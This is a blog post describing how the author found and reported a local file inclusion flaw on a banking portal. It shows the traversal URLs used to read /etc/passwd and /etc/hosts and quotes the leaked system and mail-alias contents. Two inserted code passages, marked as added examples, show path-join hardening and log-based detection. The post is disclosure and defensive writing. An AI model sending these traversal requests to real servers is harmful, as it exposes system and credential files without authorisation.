How I found an LFI vulnerability on a major banking site

Well yes, the title is a bit clickbait, but that is exactly what happened some weeks ago when I was bored on an Italian banking website; let's call it MPBbanking.

As always, "with great updates comes great responsibility" for the sysadmins who maintain such systems, and since that day was their migration day from an old platform to a new one (from mpbbanking to youweb.bankmpb), I decided to explore what new features this portal has to offer... Just a few clicks and everything seemed responsive and too cool to be true, so I tried out the good old LFI to be sure that everything was safe and configured correctly...
Typed into the browser's URL bar: youweb.bankmpb.it/../../../../etc/passwd

Created by anaconda

Users And Groups Exposed

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
..
..
.
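The request above works because the server glues the request path onto its document root and lets the `..` segments climb out of it. The following is an added example, not code from the post or from the bank's portal: a naive `unsafe_join` beside a hardened `safe_join` that decodes the path repeatedly (so `%252e%252e` cannot survive a single decode), rejects NUL bytes, forces the path to be relative and refuses anything that normalises to a location outside the root. The document root `/var/www/youweb` is an assumption; nothing in the write-up reveals the real one.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root of the portal; the real one is not known from the write-up.
WEB_ROOT = "/var/www/youweb"


def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing, so that double encoding
    (%252e%252e -> %2e%2e -> ..) cannot slip past a check that decodes only once."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def unsafe_join(root, user_path):
    """The naive handler: glue the request path onto the document root.
    normpath() collapses the '..' segments, so the result can land anywhere on disk
    (and an absolute request path makes join() discard the root entirely)."""
    return posixpath.normpath(posixpath.join(root, fully_decode(user_path)))


def safe_join(root, user_path):
    """Hardened variant: decode, reject NUL bytes, force the path to be relative,
    normalise, then refuse anything that resolved outside the root.
    Returns the filesystem path to serve, or None if the request must be refused."""
    decoded = fully_decode(user_path)
    if "\x00" in decoded:  # NUL truncation tricks against a C-level open()
        return None
    root_norm = posixpath.normpath(root)
    # A leading '/' would make join() drop the root, so strip it before joining.
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded.lstrip("/")))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None  # normalised path escaped the document root
    return candidate


if __name__ == "__main__":
    for req in ["css/app.css", "../../../../etc/passwd",
                "..%2f..%2f..%2f..%2fetc/hosts", "/etc/aliases"]:
        print(f"{req!r:36} naive -> {unsafe_join(WEB_ROOT, req):28} "
              f"hardened -> {safe_join(WEB_ROOT, req)}")
```

The string-level check is deliberately filesystem-independent so it can run anywhere; in a real handler, follow it with `os.path.realpath()` on the returned candidate and repeat the prefix test, otherwise a symlink inside the document root can still point at `/etc`. On a Windows host the backslash is a separator too, so decode and test for `..\` as well.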

At the beginning my reaction was: well, that must be a honeypot, because they should have real badass sysadmins running HIDS/DPI/sensors/alerts & monitoring on every breath of every system within the radius of an entire DC.
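Those sensors and alerts, had they existed, would have had something to work with: a traversal attempt leaves a very recognisable trace in the access log. As an added example (not from the post, and not the bank's tooling), here is the detection logic run over a few constructed combined-format log lines, with the IPs, timestamps and user agents invented for the demonstration. Browsers collapse plain `../` segments before sending a request, so the form that actually reaches the server is often percent-encoded or double-encoded; the check therefore decodes repeatedly before looking for traversal, and it also flags requests that name well-known sensitive files, whatever route they took.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format (not real logs from the site).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2018:10:01:02 +0100] "GET /css/app.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2018:10:01:09 +0100] "GET /../../../../etc/passwd HTTP/1.1" 200 1802 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2018:10:02:31 +0100] "GET /..%2f..%2f..%2fetc/hosts HTTP/1.1" 200 610 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2018:10:03:00 +0100] "GET /%252e%252e/%252e%252e/etc/aliases HTTP/1.1" 404 210 "-" "curl/7.58"
198.51.100.7 - - [12/Mar/2018:10:03:05 +0100] "GET /images/logo.png HTTP/1.1" 200 9921 "-" "curl/7.58"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# File names that have no business appearing in a web request path.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/resolv.conf", "/etc/aliases")


def fully_decode(path, max_rounds=3):
    """Percent-decode until stable so double-encoded traversal is unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(decoded_path):
    """True if the decoded path still contains a dot-dot segment (either separator)."""
    return "../" in decoded_path or "..\\" in decoded_path or decoded_path.endswith("/..")


def find_lfi_attempts(log_text):
    """Return one record per suspicious request: who, what was asked for (decoded),
    whether the server actually served it (2xx), and why the line was flagged."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        raw_path = m.group("path").split("?", 1)[0]  # ignore the query string
        decoded = fully_decode(raw_path)
        reasons = []
        if is_traversal(decoded):
            reasons.append("dot-dot traversal")
        if any(name in decoded for name in SENSITIVE):
            reasons.append("sensitive file name")
        if reasons:
            status = int(m.group("status"))
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": decoded,
                "status": status,
                "served": 200 <= status < 300,  # a 200 means the file likely went out
                "reasons": reasons,
            })
    return hits


def attempts_per_client(hits):
    """Aggregate flagged requests by source IP, the number an alert would threshold on."""
    counts = {}
    for hit in hits:
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["status"], "SERVED" if hit["served"] else "blocked",
              hit["path"], "|", ", ".join(hit["reasons"]))
    print(attempts_per_client(find_lfi_attempts(SAMPLE_LOG)))
```

The `served` flag is what separates noise from an incident: a flood of traversal probes answered with 404 is scanner background, while a single one answered with 200 and a plausible byte count for `/etc/passwd` is the line to page someone about.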

But then I thought, what if they aren't so badass and missed that, so I typed: youweb.bankmpb.it/../../../../etc/hosts and then..:


##########################
#####WARNING !!
##
##FILE MANAGED BY PUPPET
##DO NOT EDIT BY HAND
###########################
#
###########
VERONA
###########
options timeout:1 attempts:1
search servizi .group *.group *.zserver *.nexus
nameserver *.
.5.25
nameserver ..5.26
nameserver ..140.25
#nameserver ..140.26


127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4

..203.12 ..group




Wow... we are dealing with a DevOpser (Master of Puppets)... and that is an LFI (*hacker voice* "we are in", and I didn't even need my great tool Inspect Element to hack their JS/CSS).
So I kept checking whether I could find the contact of their sysadmin to report this vulnerability to him, which could cost them $$ if exploited well.... Checking the Postfix config for a contact:

#trap decode to catch security attacks
decode: root

#Person who should get root’s mail
#root: marc
#root: [email protected],[email protected]



Well, if they should get root's mail then I'll contact them about this.
The day after I got this "macro" reply from "Frank":
Good afternoon Sami,
Thank you for the advisory.

We have forwarded our email to the right department that will analyse the context and take remedial action


Best Regards,
Frank

Sent from my IBM Verse


Yep, probably the "right department" is the colleague sitting next to him and he used this "macro".


Just a few hours after this email they started to fix this LFI, with no feedback.

The next day I sent them another email (cc'ing some of their colleagues' email addresses) asking whether they have any running whitehat/bug bounty program, because if this is how they keep things secure, even a script kiddie could find some interesting stuff in their systems.

12 days later -> still no reply -> what a great way to give feedback to a fellow sysadmin who helped out and reported a vulnerability in your systems.


Yep, I know that MPBCORP is big and probably no one cares because I'm the only one who noticed this (or someone else found out and was trying to hack them silently), but what if someone had breached some serious data from your system and customer data was at risk?


What could have happened (from less to more skilled):